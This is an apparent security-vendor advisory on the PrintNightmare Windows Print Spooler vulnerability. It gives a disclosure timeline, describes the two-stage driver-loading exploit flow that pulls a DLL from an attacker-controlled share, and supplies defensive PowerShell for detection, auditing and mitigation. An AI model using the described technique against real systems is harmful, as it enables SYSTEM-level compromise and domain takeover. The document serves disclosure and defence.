Windows Print Spooler “PrintNightmare” Vulnerability, Exploits

Posted in: Resources » Cyber Heads-up

TL;DR

A vulnerability in the Windows Print Spooler service lets an attacker gain remote code execution on affected devices as SYSTEM. In the Assura’s Take section we offer three mitigation options: (1) disable the Print Spooler service; (2) apply an ACL that blocks print driver installation and upgrades; (3) disable remote connections to the Print Spooler.

Overview

Recently, the security research community has been abuzz with talk of new exploits against the Windows Print Spooler service. Remember Stuxnet? You know, the worm that destroyed nuclear enrichment centrifuges in Iran, overshot that target, and ended up infecting more than 45,000 networks? A Print Spooler vulnerability was one of the flaws Stuxnet used to spread, and the service has been an Achilles’ heel for Microsoft ever since.

CVE-2021-1675 and, subsequently, CVE-2021-34527 (aka “PrintNightmare”) describe a vulnerability that allows an attacker with regular user permissions to run code on a server as SYSTEM. By exploiting it either locally or remotely, the attacker takes complete control of the system with the highest privileges; if the target is your domain controller, they own your entire Active Directory.

The kicker? The Print Spooler service is enabled by default on all Windows servers, domain controllers included. So, unless you have explicitly disabled the service, your organization is vulnerable.

What Do We Know About This Attack?

Timeline of events that led us here:

  1. 6/16/2021: independent security researchers discover a bypass of the patch for CVE-2021-1675 and plan to use it during an upcoming zero-day competition. Word gets out in a niche community, and the exploit begins circulating within that small community.
  2. 6/28/2021: a security research team within Chinese security vendor QiAnXin, “RedDrip Team”, publishes a video demonstrating their bypass of the patch for CVE-2021-1675, showing that it provides both Local Privilege Escalation and Remote Code Execution. https://twitter.com/RedDrip7/status/1409353110187757575
  3. 6/29/2021: Zhiniang Peng publishes a PoC on GitHub and subsequently removes it, but not before it is cloned and other, similar exploits are developed from it. https://twitter.com/edwardzpeng/status/1409810304091889669
  4. 7/1/2021: Microsoft confirms the patch is ineffective and assigns a new CVE number, CVE-2021-34527.
  5. 7/2/2021: Microsoft provides updated guidance based on various community workarounds. Still no patch as of 7/6/2021.

The “PrintNightmare” vulnerability is at its core an authorization bypass: a security check that can be skipped by the caller. Microsoft intended that a user loading a printer driver onto a workstation or server (using RpcAddPrinterDriver) must hold the “SeLoadDriverPrivilege”. However, the logic in “ValidateObjectAccess”, which performs that check, takes an argument that is user-controllable. A caller who supplies the correct value in that argument bypasses the check and can load print drivers onto the target device without impediment.

Exploiting PrintNightmare is not as simple as bypassing the access check, however. To exploit the vulnerability, the attacker has to supply the malicious .dll in a very specific manner based on what the Spooler service expects.

Based on a publicly available exploit, we see the following behavior. The attacker calls RpcAddPrinterDriver with a driver whose three file fields are set as follows:

pDataFile = A.dll
pConfigFile = \\attackerIPaddress\share\malicious.dll
pDriverPath = C.dll

  1. RpcAddPrinterDriver copies A.dll, malicious.dll, and C.dll into the staging folder “C:\Windows\System32\spool\drivers\x64\3\new”.
  2. The three files are then copied into “C:\Windows\System32\spool\drivers\x64\3”.
  3. The spooler service loads “C:\Windows\System32\spool\drivers\x64\3\A.dll” and “C:\Windows\System32\spool\drivers\x64\3\C.dll”.
  4. The spooler copies pConfigFile (our malicious file) to “C:\Windows\System32\spool\drivers\x64\3\malicious.dll”. Notice, however, that the spooler has not loaded the malicious .dll yet.
  5. The attacker calls RpcAddPrinterDriver again, this time as a print driver upgrade, with pDataFile (previously A.dll) replaced by the path of malicious.dll on the target’s hard drive. When the driver is “upgraded”, malicious.dll is loaded in place of A.dll, and the attacker has successfully exploited the server.

The exploit takes this two-step form because the Spooler service accepts a UNC (Universal Naming Convention) path only for pConfigFile, not for pDataFile or pDriverPath. The attacker therefore has to get the malicious file onto the target machine first and then “upgrade” the printer driver once the file is local, so that it is copied and loaded as a driver.
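The two-stage pattern just described leaves a trail in the spooler’s own driver-installation events. The following PowerShell is an added example (not code from the original post, Assura’s research team, or any public exploit) that flags that pattern. It assumes that Event ID 316 in the Microsoft-Windows-PrintService/Operational log lists a driver’s files after the text “Files:-”, that Event ID 808 names a plug-in DLL the spooler failed to load, and that the default driver store is C:\Windows\System32\spool\drivers; the sample event messages at the bottom are constructed to mirror the two RPC calls above and the failed load, not captured from a real host.

```powershell
# Added example, not from the original post or any public exploit.
# Assumptions: Event 316 (Microsoft-Windows-PrintService/Operational) lists a
# driver's files after "Files:-", and Event 808 names a plug-in DLL the spooler
# failed to load. The sample messages at the bottom are constructed.

$DriverStore = 'C:\Windows\System32\spool\drivers'

function Get-PathsFromMessage {
    param([Parameter(Mandatory)][string]$Message)
    # Extract every UNC (\\host\share\...) or drive-letter (C:\...) path in the
    # event text; bare file names such as UNIDRV.DLL are deliberately ignored.
    [regex]::Matches($Message, '(?i)(?:\\\\[^\s,]+|[a-z]:\\[^\s,]+)') |
        ForEach-Object { $_.Value.TrimEnd('.') }
}

function Test-PrintDriverEvent {
    param(
        [Parameter(Mandatory)][int]$Id,
        [Parameter(Mandatory)][string]$Message,
        [datetime]$Time = (Get-Date)
    )
    $reasons = @()
    $paths   = @(Get-PathsFromMessage -Message $Message)

    foreach ($p in $paths) {
        if ($p -like '\\*') {
            # Stage 1: pConfigFile pointing at an attacker-controlled share.
            $reasons += "driver file on a remote share: $p"
        }
        elseif ($p -like "$DriverStore\*") {
            # Stage 2: a driver "package" whose file already sits inside the
            # driver store, i.e. the copy the spooler itself made in stage 1.
            $reasons += "driver file already inside the driver store: $p"
        }
    }
    if ($Id -eq 808) {
        # A payload that runs in DllMain and returns FALSE leaves the spooler
        # reporting a failed plug-in load (error 0x45A, ERROR_DLL_INIT_FAILED).
        $reasons += 'spooler failed to load a driver plug-in'
    }

    [pscustomobject]@{
        Time       = $Time
        Id         = $Id
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = $reasons
        Paths      = $paths
    }
}

function Get-SuspiciousPrintDriverEvents {
    # Live query. The log is disabled by default; enable it first with:
    #   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316, 808 } -ErrorAction SilentlyContinue |
        ForEach-Object { Test-PrintDriverEvent -Id $_.Id -Message $_.Message -Time $_.TimeCreated } |
        Where-Object Suspicious
}

# Constructed sample events mirroring the two RPC calls and the failed load.
$SampleEvents = @(
    @{ Id = 316; Message = 'Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, \\attackerIPaddress\share\malicious.dll. No user action is required.' },
    @{ Id = 316; Message = 'Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- C:\Windows\System32\spool\drivers\x64\3\malicious.dll, kernelbase.dll, \\attackerIPaddress\share\malicious.dll. No user action is required.' },
    @{ Id = 808; Message = 'The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\malicious.dll, error code 0x45A.' },
    @{ Id = 316; Message = 'Printer driver Microsoft XPS Document Writer v4 for Windows x64 Version-4 was added or updated. Files:- mxdwdrv.dll. No user action is required.' }
)

$SampleEvents |
    ForEach-Object { Test-PrintDriverEvent -Id $_.Id -Message $_.Message } |
    Format-Table Id, Suspicious, Reasons -AutoSize
```

The first three sample events are flagged and the legitimate XPS driver install is not: a bare file name never triggers, while a UNC path or a full path that already sits inside the driver store is exactly what distinguishes the exploit’s “package” from a normal driver install. Run Get-SuspiciousPrintDriverEvents against a real host only after enabling the operational log, since it is off by default and earlier driver installs are not recorded.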

Here is an example of the exploit run by our research team against a fully patched Windows Server 2019:

Attacker account (low-privileged domain user):

[Screenshot 1: Unprivileged user properties]
[Screenshot 2: Unprivileged user group membership]

Print Spooler Service in a Running state due to Automatic startup (default setting!):

[Screenshot 3: Spooler service in the Running state]
[Screenshot 4: Spooler service set to Automatic startup]

CVE-2021-1675 Patch (KB5003646) has been applied:

[Screenshot 5: KB5003646 patch applied]

Patched version of the Spooler Service for reference:

[Screenshot 6: Updated Spooler service version]

Exploit video: [embedded video]

Assura’s Take

A number of devastating exploits are currently circulating on the internet. Many of them work not only against Windows servers but against any Windows workstation running the Print Spooler service.

Assura has a few mitigation options that organizations can take to protect themselves or reduce the potential for exploitation:

Option 1 – Disable the print spooler service on all devices where printing is not necessary.

Option 2 – Where printing is necessary but loading new print drivers is not, implement the following ACL workaround (provided by TrueSec) from an elevated PowerShell session:

$Path = "C:\Windows\System32\spool\drivers"
# Read the current DACL of the driver store
$Acl = (Get-Item $Path).GetAccessControl('Access')
# Deny the SYSTEM account (which the spooler runs as) Modify rights on the folder, its subfolders and files
$Ar = New-Object System.Security.AccessControl.FileSystemAccessRule("System", "Modify", "ContainerInherit, ObjectInherit", "None", "Deny")
$Acl.AddAccessRule($Ar)
Set-Acl $Path $Acl

This adds a Deny rule on the drivers directory and all of its subdirectories that prevents the SYSTEM account from modifying their contents. With the ACL in place, the server can still act as a print server for remote devices, but no new or updated drivers can be installed, so legitimate driver installs and updates will also fail until the rule is removed. The rule can be removed with the following PowerShell:

$Path = "C:\Windows\System32\spool\drivers"
$Acl = (Get-Item $Path).GetAccessControl('Access')
# Build the same Deny rule so it can be matched and removed
$Ar = New-Object System.Security.AccessControl.FileSystemAccessRule("System", "Modify", "ContainerInherit, ObjectInherit", "None", "Deny")
$Acl.RemoveAccessRule($Ar) | Out-Null
Set-Acl $Path $Acl

Option 3 – Microsoft’s guidance offers two workarounds. The first is to disable the Print Spooler service altogether, as we suggested in Option 1. The second is to disable inbound remote printing through Group Policy. This blocks the remote attack vector by preventing inbound remote printing operations: the system will no longer function as a print server, but local printing to a directly attached device will still work. Note that this only removes the remote vector; a user already on the machine can still reach the spooler, so the local privilege escalation path remains.

  1. Within Group Policy:
    1. Computer Configuration > Administrative Templates > Printers
    2. Set the “Allow Print Spooler to accept client connections” policy to Disabled to block remote connections/attacks.
  2. Restart the Print Spooler service for the policy to take effect.
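The following PowerShell is an added example (not from the original post or from Microsoft’s guidance) that audits a host against the three options above and can apply Options 1 and 3 locally. It assumes that the “Allow Print Spooler to accept client connections” policy is backed by the registry value RegisterSpoolerRemoteRpcEndPoint under HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers (1 = enabled, 2 = disabled), that the Option 2 workaround shows up as a Deny/Modify ACE for SYSTEM on C:\Windows\System32\spool\drivers, and that it runs in an elevated session.

```powershell
# Added example, not from the original post. Assumptions are noted inline.
$PolicyKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$PolicyValue = 'RegisterSpoolerRemoteRpcEndPoint'   # assumed backing value of the GPO setting
$DriverStore = 'C:\Windows\System32\spool\drivers'

function Get-SpoolerExposure {
    # Option 1 state: is the service running, and will it come back at boot?
    $svc     = Get-Service -Name Spooler
    $startup = (Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'").StartMode

    # Option 3 state: 2 = policy Disabled (no remote RPC endpoint); anything else,
    # including "not configured", leaves the remote endpoint registered.
    $remote = (Get-ItemProperty -Path $PolicyKey -Name $PolicyValue -ErrorAction SilentlyContinue).$PolicyValue
    $remoteAllowed = ($remote -ne 2)

    # Option 2 state: the TrueSec workaround is a Deny/Modify ACE for SYSTEM on the driver store.
    $denyAce = (Get-Acl -Path $DriverStore).Access | Where-Object {
        $_.AccessControlType -eq 'Deny' -and
        $_.IdentityReference -like '*\SYSTEM' -and
        $_.FileSystemRights -match 'Modify'
    }

    [pscustomobject]@{
        SpoolerRunning     = ($svc.Status -eq 'Running')
        StartupType        = $startup
        RemoteRpcAllowed   = $remoteAllowed
        DriverStoreDenyAce = [bool]$denyAce
        Exposed            = ($svc.Status -eq 'Running') -and $remoteAllowed -and -not $denyAce
    }
}

function Disable-SpoolerService {
    # Option 1: stop the service and keep it from starting again.
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
}

function Disable-SpoolerRemoteRpc {
    # Option 3 applied to the local registry (the same value the GPO writes).
    if (-not (Test-Path -Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $PolicyKey -Name $PolicyValue -Value 2 -Type DWord
    # The setting is read when the spooler starts, so restart it.
    Restart-Service -Name Spooler -Force
}

Get-SpoolerExposure
```

Run Get-SpoolerExposure before and after a change; Exposed is true only when the service is running, remote RPC connections are still allowed, and no Deny ACE is present on the driver store. Writing the registry value directly suits a standalone host or a test box; on a domain-joined machine use the Group Policy setting so the value is not overwritten at the next policy refresh.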

The best option for your organization may be different from others, and you may need to implement a combination of the above mitigations as appropriate for your environment based on your printing needs.

Assura has tested the above mitigations and can affirm that the exploits do indeed fail when the mitigations are appropriately applied:

[Screenshot 7: Example of a failed exploit attempt]

In addition to the mitigations, please ensure that you are using up-to-date anti-virus or Endpoint Detection and Response to help prevent and detect any exploitation on your devices. If you are an Assura Managed Endpoint Protection client we are monitoring for exploit attempts in real-time.

If you’re an Assura client, please do not hesitate to reach out to your Virtual ISO or Assura SOC point-of-contact if you have questions about this vulnerability or our response. Otherwise, please contact us.
